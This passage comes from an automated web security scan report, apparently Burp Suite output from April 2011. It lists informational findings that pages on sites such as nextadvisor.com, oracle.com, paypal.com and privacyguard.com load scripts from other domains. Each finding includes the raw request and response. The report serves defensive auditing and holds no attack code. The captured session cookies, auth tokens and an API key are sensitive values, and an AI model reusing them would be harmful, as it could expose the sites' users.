Cookie: __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:55:25 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=8e16e97cfee8227e18a5c43f03009ed6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 54422


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.263. http://www.nextadvisor.com/credit_report_monitoring/free_credit_score_review.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /credit_report_monitoring/free_credit_score_review.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /credit_report_monitoring/free_credit_score_review.php HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=42bb280306117df0c9cb96a64969e55a; __utmz=252293142.1303674300.2.2.utmgclid=CPK-2pL1tagCFUxo5QodMipJDQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303674300.2; __utmc=252293142

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:44:27 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 24403


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.264. http://www.nextadvisor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /favicon.ico HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:10:10 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
</div>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

24.265. http://www.oracle.com/us/go/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/go/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/go/index.html?&Src=7054579&Act=9&SC=sckw=WWMK10058753MPP001.GCM.8100.110 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (TM;max-age=300+0;age=0;ecid=221079983340524304,0)
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 19:45:36 GMT
Connection: close
Content-Length: 3375

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html>
<head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><scr
...[SNIP]...
<!-- Start SiteCatalyst code -->
   <script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code_ocom.js"></script>    
<script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/s_code.js"></script>
...[SNIP]...

24.266. http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /webapps/dialogue/ns/dlgwelcome.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8834744&src=7054579&Act=9&sckw=WWMK10058753MPP001.GCM.8100.110 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/pls/www/go.lp?kw=&Src=7054579&Act=9&SC=sckw=WWMK10058753MPP001.GCM.8100.110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 19:45:39 GMT
Connection: close
Set-Cookie: JSESSIONID=2e63fae3eb91f5fc5259bf707b004df90622e3ad401be1a214b18c793ce79d23.e3yTa3qTahyRe3uRb3aSchyTby0; path=/webapps/dialogue
Content-Length: 11659

<!-- ver 1.1 -->


<SCRIPT src="form.js" language="Javascript"></SCRIPT>

<!-- VKUMAR
<SCRIPT language='JavaScript' src='http://www.oracle.com/admin/jscripts/lib.js'></SCRIPT>
<sc
...[SNIP]...
</script>    <script language="JavaScript" src="http://www.oracleimg.com/ocom/groups/systemobject/@mktg_admin/documents/systemobject/oratrack.js"></script>
...[SNIP]...
</script>        <script language="JavaScript" src="http://www.googleadservices.com/pagead/conversion.js">        </script>
...[SNIP]...

24.267. https://www.paypal.com/cgi-bin/webscr  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.paypal.com
Path:   /cgi-bin/webscr

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cgi-bin/webscr HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:52:47 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=sT_I63NuUR8LcE-tuRsQ5JgX5j4FM6fbZrEXkeGREDWPCDpPdl4qfrs6ypGS8IgVxSjjxsRKnGeafhSyMq1ZS1PJW3n0n15HpMokWcZjOuxriDljpK5cu_5qm33nM3QcMOJp-0%7c0mUK39OzvMDBZKIY55RYJ6j_BtoDi5ockOySsmyAlvUwdtM-jxqcTWjhEO6-fDz0fbHX10%7cBr7I2M0muunKbPwJZggbyDS6A5tobB-8N0Tk4dp5P1igDVsWXpxDcsmgKFTN_I1XuL1u-G%7c1303663968; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=ly4prVVJG_b0nU4XMqMUklBtFWWgyHjwVp8kw7WCtMl1PTFxLmM-9ciCTN0y1zlmQwmDRdwh1nRQZrtB; expires=Sat, 19-Apr-2031 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cookie_check=yes; expires=Wed, 21-Apr-2021 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; expires=Wed, 21-Apr-2021 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Sat, 19-Apr-2031 16:52:48 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: Apache=10.190.8.159.1303663967738130; path=/; expires=Tue, 16-Apr-41 16:52:47 GMT
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31254

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#">
<head>
<meta http-equiv="C
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110401-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110401-1/js/tns/mid.js"></script>
...[SNIP]...
<!-- OnlineOpinionF3cS v3.0-->
<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110401-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110401-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110401-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110401-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110401-1/js/pp_naturalsearch.js"></script>
...[SNIP]...
<!-- SiteCatalyst Code
Copyright 1997-2005 Omniture, Inc.
More info available at http://www.omniture.com -->
<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110401-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...

24.268. https://www.pcisecuritystandards.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pcisecuritystandards.org
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.pcisecuritystandards.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 04:27:56 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20490

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

24.269. https://www.pcisecuritystandards.org/security_standards/documents.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pcisecuritystandards.org
Path:   /security_standards/documents.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /security_standards/documents.php HTTP/1.1
Host: www.pcisecuritystandards.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 24 Apr 2011 16:52:16 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</script><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...

24.270. http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /article/149142/identity_theft_monitoring_services_called_waste.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /article/149142/identity_theft_monitoring_services_called_waste.html HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:47:17 GMT
Server: Apache
X-GasHost: gas1
X-Cooking-With: Gasoline-Local
X-Gasoline-Age: 178
Last-Modified: Sun, 24 Apr 2011 19:03:53 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 88629


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</script>
<script type="text/javascript" src="http://cdn.gigya.com/js/socialize.js?apiKey=2_cyT43nnmGBLrcjJe5U_E9DFbmhuzMJ9Y7DrGQ7aR-5yHczjRlVFXGvL60CPcBw2T"></script>
...[SNIP]...
</script>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js?" ></script>
...[SNIP]...
</div>
   <script type="text/javascript" src="http://zapp4.staticworld.net/js/adlinks.js"></script>
...[SNIP]...

24.271. http://www.positivesearchresults.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:30 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
X-Content-Encoded-By: Joomla! 1.5
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: bbd55d5d7e98372b0a401649530373ff=48b1be1e8ff193660268fe947051d30b; path=/
Last-Modified: Mon, 25 Apr 2011 00:32:30 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 24645

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

24.272. http://www.privacyguard.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.privacyguard.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.privacyguard.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 23981
Content-Type: text/html; charset=iso-8859-1
Expires: -1
X-Served-By: FOX
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: ASP.NET_SessionId=p1gb0ejpvt4afn45w4s11q55; path=/; HttpOnly
Set-Cookie: hasCookies=true; path=/
Set-Cookie: Visitor=67bf199058fc4cff85e2455d2b6e4342; expires=Tue, 24-Apr-2012 19:51:14 GMT; path=/
Date: Sun, 24 Apr 2011 19:51:13 GMT

<!-- served by FOX -->
<!-- Time Stamp 4/24/2011 7:51:14 PM -->
<!-- Brand Code: PG_NEW -->
<!-- RefCode: P158PVGDSD0004 -->
<!-- Product Def Id: 620 -->
<!-- Service Id: 9 -->
<!-- Service Code
...[SNIP]...
</script>
           <script type="text/javascript" src="http://twitter.com/statuses/user_timeline/PrivacyGuard.json?callback=twitterCallback2&amp;count=2"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<!-- end bca: /BCA/PG_NEW/Default/home.bca -->
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"> </script>
...[SNIP]...

24.273. https://www.privacyguard.com/secure/EnableWebAccess.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.privacyguard.com
Path:   /secure/EnableWebAccess.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /secure/EnableWebAccess.aspx HTTP/1.1
Host: www.privacyguard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vjqmz2rc2b0xys55zdgjhzzd; Visitor=c503162f39474998a2c7f2c0f13737f7; __utmz=88639066.1303674285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=88639066.483249494.1303674285.1303674285.1303674285.1; __utmc=88639066; __utmb=88639066.2.10.1303674285; hasCookies=true

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 26150
Content-Type: text/html; charset=iso-8859-1
Expires: -1
X-Served-By: MAPLE
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: hasCookies=true; path=/
Date: Sun, 24 Apr 2011 20:22:21 GMT

<!-- served by MAPLE -->
<!-- Time Stamp 4/24/2011 8:22:22 PM -->
<!-- Brand Code: PG_NEW -->
<!-- RefCode: P158PVGDSD0004 -->
<!-- Product Def Id: 620 -->
<!-- Service Id: 9 -->
<!-- Service Co
...[SNIP]...
</script>

<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<!-- end bca: /BCA/PG_NEW/Default/EnableWebAccess.bca -->
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"> </script>
...[SNIP]...

24.274. https://www.privacyguard.com/secure/ForgotPassword.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.privacyguard.com
Path:   /secure/ForgotPassword.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /secure/ForgotPassword.aspx HTTP/1.1
Host: www.privacyguard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vjqmz2rc2b0xys55zdgjhzzd; Visitor=c503162f39474998a2c7f2c0f13737f7; __utmz=88639066.1303674285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=88639066.483249494.1303674285.1303674285.1303674285.1; __utmc=88639066; __utmb=88639066.2.10.1303674285; hasCookies=true

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 17955
Content-Type: text/html; charset=iso-8859-1
Expires: -1
X-Served-By: FOX
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: hasCookies=true; path=/
Date: Sun, 24 Apr 2011 20:22:22 GMT

<!-- served by FOX -->
<!-- Time Stamp 4/24/2011 8:22:22 PM -->
<!-- Brand Code: PG_NEW -->
<!-- RefCode: P158PVGDSD0004 -->
<!-- Product Def Id: 620 -->
<!-- Service Id: 9 -->
<!-- Service Code
...[SNIP]...
</script>

<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<!-- end bca: /BCA/PG_NEW/Default/ForgotPassword1.bca -->
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"> </script>
...[SNIP]...

24.275. https://www.privacyguard.com/secure/ForgotUserName.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.privacyguard.com
Path:   /secure/ForgotUserName.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /secure/ForgotUserName.aspx HTTP/1.1
Host: www.privacyguard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vjqmz2rc2b0xys55zdgjhzzd; Visitor=c503162f39474998a2c7f2c0f13737f7; __utmz=88639066.1303674285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hasCookies=true; __utma=88639066.483249494.1303674285.1303674285.1303674285.1; __utmc=88639066; __utmb=88639066.2.10.1303674285

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 20958
Content-Type: text/html; charset=iso-8859-1
Expires: -1
X-Served-By: MAPLE
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: hasCookies=true; path=/
Date: Sun, 24 Apr 2011 20:22:23 GMT

<!-- served by MAPLE -->
<!-- Time Stamp 4/24/2011 8:22:24 PM -->
<!-- Brand Code: PG_NEW -->
<!-- RefCode: P158PVGDSD0004 -->
<!-- Product Def Id: 620 -->
<!-- Service Id: 9 -->
<!-- Service Co
...[SNIP]...
</script>

<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<!-- end bca: /BCA/PG_NEW/Default/ForgotUsername1.bca -->
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"> </script>
...[SNIP]...

24.276. https://www.privacyguard.com/secure/Signin.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.privacyguard.com
Path:   /secure/Signin.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

POST /secure/Signin.aspx HTTP/1.1
Host: www.privacyguard.com
Connection: keep-alive
Referer: http://www.privacyguard.com/
Cache-Control: max-age=0
Origin: http://www.privacyguard.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=vjqmz2rc2b0xys55zdgjhzzd; Visitor=c503162f39474998a2c7f2c0f13737f7; __utmz=88639066.1303674285.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=88639066.483249494.1303674285.1303674285.1303674285.1; __utmc=88639066; __utmb=88639066.2.10.1303674285; hasCookies=true
Content-Length: 178

signin_username=&signin_password=&signin_submit.x=33&signin_submit.y=7&xAuthToken=6649VJKXQCZUAX9QVI2BLINJCWSZTY8X4&authToken=7izifhVGqcdIUJGZjeHURcC5mFzQXeq%2BTKaK%2Bx%2BN4zk%3D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 20894
Content-Type: text/html; charset=iso-8859-1
Expires: -1
X-Served-By: FOX
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: hasCookies=true; path=/
Date: Sun, 24 Apr 2011 20:22:22 GMT

<!-- served by FOX -->
<!-- Time Stamp 4/24/2011 8:22:23 PM -->
<!-- Brand Code: PG_NEW -->
<!-- RefCode: P158PVGDSD0004 -->
<!-- Product Def Id: 620 -->
<!-- Service Id: 9 -->
<!-- Service Code
...[SNIP]...
</script>

<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<!-- end bca: /BCA/PG_NEW/Default/SignIn.bca -->
